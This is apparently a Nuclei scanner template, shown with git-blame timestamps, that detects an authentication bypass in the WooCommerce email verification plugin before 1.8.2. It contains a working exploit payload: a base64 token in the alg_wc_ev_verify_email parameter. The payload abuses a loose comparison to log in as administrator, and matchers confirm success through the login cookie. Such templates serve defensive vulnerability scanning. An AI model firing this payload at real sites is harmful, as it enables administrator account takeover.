2020-09-15 19:25:55 +00:00
|
|
|
id: wp-woocommerce-email-verification
|
2022-03-26 11:15:50 +00:00
|
|
|
|
2020-09-08 18:27:06 +00:00
|
|
|
info:
|
2022-06-03 19:12:31 +00:00
|
|
|
name: WordPress WooCommerce <1.8.2 - Authentication Bypass
|
2022-04-17 06:21:29 +00:00
|
|
|
author: random_robbie,daffianfo
|
2020-09-08 11:12:53 +00:00
|
|
|
severity: critical
|
2022-06-03 19:12:31 +00:00
|
|
|
description: WordPress WooCommerce prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://wpvulndb.com/vulnerabilities/10318
|
2022-06-03 19:12:31 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
|
|
cvss-score: 10.0
|
|
|
|
cwe-id: CWE-288
|
2022-03-26 11:15:50 +00:00
|
|
|
tags: wordpress,wp-plugin,woocommerce
|
2020-09-08 18:27:06 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2022-04-17 06:21:29 +00:00
|
|
|
- "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
|
2020-09-08 11:25:55 +00:00
|
|
|
- "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
|
2021-10-01 11:01:50 +00:00
|
|
|
|
2021-10-01 01:49:21 +00:00
|
|
|
stop-at-first-match: true
|
2020-09-08 18:27:06 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-03-26 11:15:50 +00:00
|
|
|
- type: regex
|
2021-01-11 06:44:22 +00:00
|
|
|
part: header
|
2022-03-26 11:15:50 +00:00
|
|
|
regex:
|
|
|
|
- "wordpress_logged_in_[a-z0-9]{32}"
|
2021-01-11 06:44:22 +00:00
|
|
|
|
2022-04-17 06:21:29 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "Your account has been activated!"
|
|
|
|
- "From your account dashboard you can view your"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-06-03 19:12:31 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/31
|